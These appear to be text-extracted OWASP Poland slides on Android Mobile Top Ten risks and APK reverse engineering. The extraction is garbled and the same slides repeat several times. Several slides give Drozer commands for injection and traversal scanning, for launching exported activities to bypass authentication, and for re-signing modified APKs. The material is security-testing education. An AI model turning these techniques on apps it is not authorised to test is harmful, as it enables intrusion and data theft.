atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
